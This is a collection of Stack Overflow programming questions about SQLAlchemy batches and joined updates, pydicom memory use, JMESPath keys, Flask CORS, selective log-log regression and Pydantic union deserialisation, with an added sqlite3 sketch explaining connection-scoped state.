<h2>Problem</h2> <p>I have a bunch of dependent SQL statements that I would like to run in the same context in sqlalchemy, but I cannot make it work.</p> <h2>Running All at Once</h2> <pre><code>values = ', '.join(f&quot;('{id}')&quot; for id in obligor_ids) q = f&quot;&quot;&quot; USE {database}; DECLARE @ObligorIDs AS {schema}.ObligorIDListType; INSERT INTO @ObligorIDs (ID) VALUES {values}; SELECT * FROM {schema}.GetLUsByObligorID(@ObligorIDs); &quot;&quot;&quot; engine.execute(q) </code></pre> <p>This fails with the error message &quot;This result object does not return rows. It has been closed automatically&quot; because multiple batches cannot be run in one query. I have also tried wrapping the string in &quot;text&quot; as suggested in multiple places, but with the same result. When I run the EXACT same query in SQL Management Studio it works like a charm.</p> <h2>Running batches one-by-one in a Session</h2> <pre><code># Switching to sql function database q1 = f&quot;USE {database};&quot; # Declaring input q2 = f&quot;DECLARE @ObligorIDs AS {schema}.ObligorIDListType;&quot; q3 = f&quot;INSERT INTO @ObligorIDs (ID) VALUES {values};&quot; # Declaring output q4 = f&quot;SELECT * FROM {schema}.GetLUsByObligorID(@ObligorIDs);&quot; # Running sql function with Session(engine) as session: session.execute(q1) session.execute(q2) session.execute(q3) result = session.execute(q4).fetchall() session.commit() </code></pre> <p>This fails because session.execute(q4) cannot access @ObligorIDs.</p>
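The underlying rule, sketched here with stdlib `sqlite3` so it runs anywhere: statements that share server-side state must reach the server on the *same* connection, and a multi-statement script can be submitted as one batch. On the SQL Server + sqlalchemy side the analogous move would be sending the whole T-SQL script through one raw DBAPI cursor or `connection.exec_driver_sql` (a SQLAlchemy 1.4+ API) so the `DECLARE`d variable and the `SELECT` live in the same batch — the sqlite demo below only illustrates the connection-scoping idea, not SQL Server semantics:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
# One batch: the temp table plays the role of the @ObligorIDs variable.
cur.executescript("""
    CREATE TEMP TABLE obligor_ids (id TEXT);
    INSERT INTO obligor_ids VALUES ('A'), ('B');
""")
# A later statement on the SAME connection still sees the temp state:
rows = cur.execute("SELECT id FROM obligor_ids ORDER BY id").fetchall()
print(rows)   # [('A',), ('B',)]
```

The Session version in the question fails precisely because each `session.execute` may be sent as its own batch, and a T-SQL `DECLARE` does not survive across batches.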
<python><sql><sql-server><sqlalchemy><subquery>
2024-01-12 13:34:32
1
3,944
Esben Eickhardt
77,806,881
1,279,000
How do I update multiple rows when applying a left join on a model query?
<p>In this little card scanning app demo I'm making while learning SQLAlchemy, I'm attempting to make any card(s) assigned to a user inactive after the user is made inactive. I'm struggling to write a query that will update the access card status value with a left join in the mix. Here's what I have now:</p> <pre><code># if user does not have active status, update any assigned card(s) status to inactive if user.status != UserStatusEnum.ACTIVE: db.session.query(AccessCard) \ .join( UserAccessCard, UserAccessCard.access_card_id == AccessCard.id, isouter=True ) \ .update(status=AccessCardStatusEnum.INACTIVE) \ .where(UserAccessCard.assigned_to_user_id == user.id) </code></pre> <p>Error:</p> <pre><code>TypeError: Query.update() got an unexpected keyword argument 'status' </code></pre> <p>This is specific to <code>AccessCard.status</code>. When entering that:</p> <pre><code>... .update(AccessCard.status=AccessCardStatusEnum.INACTIVE) ... </code></pre> <p>I get a new error:</p> <pre><code> .update(AccessCard.status=AccessCardStatusEnum.INACTIVE) \ ^^^^^^^^^^^^^^^^^^ SyntaxError: expression cannot contain assignment, perhaps you meant &quot;==&quot;? </code></pre> <p>I feel like I'm super close. The join is tripping me up though. I can see querying the cards, then updating individually in a loop as one option. Yet, that seems like more steps than needed.</p> <p>How should I make this joined update query happen?</p>
<python><sqlalchemy><flask-sqlalchemy>
2024-01-12 13:23:41
1
1,278
Christopher Stevens
77,806,839
2,168,548
pydicom.dcmread() consumes a lot of memory when working with bigger files
<p>Is there a way to read the DICOM file using a buffer?</p> <p>I tried <code>defer_size='50 MB'</code>, but when I accessed the pixel data, all of it was read and stored in memory.</p> <p>Can I do something like:</p> <pre><code>def buffered_dcmread(file_path, buffer_size=4096): with open(file_path, 'rb') as file: buffer = file.read(buffer_size) while buffer: dataset = pydicom.dcmread(buffer, stop_before_pixels=True) file.seek(dataset.end_tell) buffer = file.read(buffer_size) dicom_file_path = 'dicom_file.dcm' buffered_dcmread(dicom_file_path) </code></pre> <p>I am working with multi-frame files and I need to convert each frame to a JPEG.</p> <p>How do I do that without loading all the pixel data into the memory?</p>
<python><pydicom>
2024-01-12 13:15:31
1
359
ShoibAhamed
77,806,829
2,989,777
How can I write a JMESPath expression to select a keys containing brackets ("({")?
<p>Given the dictionary</p> <pre class="lang-py prettyprint-override"><code>product_data = { 'restrictions({&quot;basketItems&quot;:[],&quot;endDateTime&quot;:&quot;&quot;,&quot;startDateTime&quot;:&quot;&quot;})': [ { '__typename': 'ProductRestrictionType', 'type': 'RdgDateRange', 'isViolated': False, 'message': 'Price Cuts - Was £0.50\n' }, { '__typename': 'ProductRestrictionType', 'type': 'ExcludedProduct', 'isViolated': True, 'message': 'This product is unavailable' } ] } </code></pre> <p>I wanted to select the following key</p> <pre class="lang-none prettyprint-override"><code>restrictions({&quot;basketItems&quot;:[],&quot;endDateTime&quot;:&quot;&quot;,&quot;startDateTime&quot;:&quot;&quot;}) </code></pre> <p>I tried the following but I am getting an error due to brackets:</p> <pre class="lang-py prettyprint-override"><code>import jmespath expression = jmespath.compile('restrictions({&quot;basketItems&quot;:],&quot;endDateTime&quot;:&quot;&quot;,&quot;startDateTime&quot;:&quot;&quot;})') result = expression.search(product_data) </code></pre> <p>How can I fix this expression JMESPath?</p>
<python><json><jmespath>
2024-01-12 13:13:50
1
1,185
yasirnazir
77,806,798
13,180,560
Unable to bypass CORS in my Flask and React app
<p>I am getting a CORS error most of the time; even if I give access to all origins, it gives the same issue.</p> <p><a href="https://i.sstatic.net/TWSUi.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/TWSUi.png" alt="CORS ERROR" /></a></p> <p>Here is my code in Flask</p> <p><a href="https://i.sstatic.net/IWRSP.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/IWRSP.png" alt="enter image description here" /></a></p> <pre><code>if __name__ == '__main__': # app.run(port=5000) socketio.run(app, debug=True) </code></pre> <p>Your help would be appreciated.</p>
<python><reactjs><flask><socket.io><flask-socketio>
2024-01-12 13:08:52
1
1,416
Amir Doreh
77,806,675
11,829,002
Compute a linear regression, not for all data points
<p>I'm plotting errors obtained for various mesh sizes to study the order of convergence of the model. As shown in the two plots below, the &quot;good regime&quot; is not always present, either because the mesh is too coarse (Fig. 1) or because we reach floating-point precision (Fig. 2).</p> <p><a href="https://i.sstatic.net/9q3ur.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/9q3ur.png" alt="Fig. 1" /></a> <a href="https://i.sstatic.net/cp8oE.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/cp8oE.png" alt="Fig. 2" /></a></p> <p>So computing the linear regression on the whole data set would not yield correct results. One solution would be to manually remove the undesired points and then compute the linear regression (with <code>sklearn.linear_model</code>, for instance), but as I have about 144 data frames to deal with, that would take a lot of time!</p> <p>I did not find such a feature in <code>sklearn.linear_model</code>. Does it exist? Or is there a module that does it?</p> <p>I also imagined a workaround consisting of computing all the slopes between consecutive points and keeping, for the actual linear regression, only the values that are « the most frequent », but I did not manage to implement this.</p> <p>On the two figures, I underlined in red the points I'd like to keep for the linear regression.</p> <p>Here is the code I used to get the plot:</p> <pre class="lang-py prettyprint-override"><code>import plotly.graph_objects as go
from io import StringIO
import pandas as pd
import numpy as np
from sklearn.linear_model import LinearRegression
import plotly.express as px

df = pd.read_csv(StringIO(&quot;&quot;&quot;hsize,errorl2
0.1,0.0126488001839
0.05,0.0130209787153
0.025,0.0111789092046
0.0125,0.00766945668181
0.00625,0.0012502455118
0.003125,0.000268314690697
&quot;&quot;&quot;))

def linear_regression_log(x, y):
    # Compute the linear regression for log-log data,
    # but here all the points are used in the computation
    keep = ~np.isnan(y)  # in my case, some data are missing
    log_x = np.log(np.array(x[keep]))
    log_y = np.log(np.array(y[keep]))
    model = LinearRegression()
    model.fit(log_x.reshape(-1, 1), log_y)
    slope = model.coef_[0]
    intercept = model.intercept_
    return slope, intercept

# Sample data
x = df['hsize']
y = df['errorl2']
a, _ = linear_regression_log(x, y)

fig = go.Figure()
fig.add_trace(go.Scatter(x=x, y=y, mode='markers+lines'))
fig.update_layout(title=f&quot;Slope: {a:.2f}&quot;)
fig.update_xaxes(type=&quot;log&quot;)
fig.update_yaxes(type=&quot;log&quot;)
fig.show()
</code></pre> <p>And the data I plotted:</p> <ul> <li>Fig. 1:</li> </ul> <pre><code>hsize,errorl2
0.1,0.0126488001839
0.05,0.0130209787153
0.025,0.0111789092046
0.0125,0.00766945668181
0.00625,0.0012502455118
0.003125,0.000268314690697
</code></pre> <ul> <li>Fig. 2:</li> </ul> <pre><code>hsize,errorl2
0.1,0.000713407986653
0.05,1.60793872143e-06
0.025,6.20078712336e-11
0.0125,2.99238475669e-13
0.00625,1.1731644955e-13
0.003125,1.88186766825e-13
</code></pre>
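The consecutive-slopes workaround described in the question can be sketched as follows. This is a minimal illustration, not part of the original question: it assumes the segment slopes inside the "good regime" cluster around the median segment slope, and `tol` is a made-up tolerance that would need tuning per data set.

```python
import numpy as np

def filter_linear_regime(x, y, tol=0.5):
    """Keep points that bound at least one log-log segment whose
    slope lies within `tol` of the median segment slope."""
    lx = np.log(np.asarray(x, dtype=float))
    ly = np.log(np.asarray(y, dtype=float))
    slopes = np.diff(ly) / np.diff(lx)          # slope of each consecutive segment
    good = np.abs(slopes - np.median(slopes)) < tol
    keep = np.zeros(lx.size, dtype=bool)
    keep[:-1] |= good                           # left endpoint of a good segment
    keep[1:] |= good                            # right endpoint of a good segment
    return keep

# Synthetic second-order data with one flat "bad" tail point,
# mimicking the floating-point plateau of Fig. 2
x = np.array([0.1, 0.05, 0.025, 0.0125, 0.00625])
y = x**2
y[-1] = y[-2]                                   # plateau: error stops decreasing

keep = filter_linear_regime(x, y)
slope, intercept = np.polyfit(np.log(x[keep]), np.log(y[keep]), 1)
print(keep, slope)                              # last point dropped, slope ~ 2
```

Fitting only the kept points recovers the expected convergence order; with 144 data frames this runs in a loop with no manual point removal.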
<python><scikit-learn><linear-regression>
2024-01-12 12:47:42
1
398
Thomas
77,806,510
14,720,380
Can I use Pydantic to deserialize a Union type, without creating another basemodel?
<p>I want to deserialize some data into a union type like so:</p> <pre class="lang-py prettyprint-override"><code>from pydantic import BaseModel, Field
from typing import Annotated, Union, Literal

class Foo(BaseModel):
    type: Literal[&quot;foo&quot;] = &quot;foo&quot;
    x: int

class Bar(BaseModel):
    type: Literal[&quot;bar&quot;] = &quot;bar&quot;
    x: float

Baz = Annotated[Union[Foo, Bar], Field(discriminator=&quot;type&quot;)]

d = {
    &quot;type&quot;: &quot;bar&quot;,
    &quot;x&quot;: 10.1
}

# Deserialize Baz here
</code></pre> <p>This could be done by making another base model and deserializing it there, but I was wondering whether Pydantic provides a function to do it without one:</p> <pre class="lang-py prettyprint-override"><code>class Config(BaseModel):
    baz: Baz

model = Config.model_validate({&quot;baz&quot;: d})
print(model)  # Outputs: baz=Bar(type='bar', x=10.1)
</code></pre>
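For what it's worth, one approach in Pydantic v2 that avoids the wrapper model is `TypeAdapter`, which attaches validation machinery to an arbitrary type such as this discriminated union. A sketch reusing the definitions above:

```python
from typing import Annotated, Literal, Union

from pydantic import BaseModel, Field, TypeAdapter

class Foo(BaseModel):
    type: Literal["foo"] = "foo"
    x: int

class Bar(BaseModel):
    type: Literal["bar"] = "bar"
    x: float

Baz = Annotated[Union[Foo, Bar], Field(discriminator="type")]

# TypeAdapter provides validate/dump methods for any type,
# so no extra BaseModel is required
obj = TypeAdapter(Baz).validate_python({"type": "bar", "x": 10.1})
print(obj)
```

The same adapter also exposes `validate_json` and `dump_python`, so it covers both directions of (de)serialization.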
<python><pydantic><pydantic-v2>
2024-01-12 12:19:21
1
6,623
Tom McLean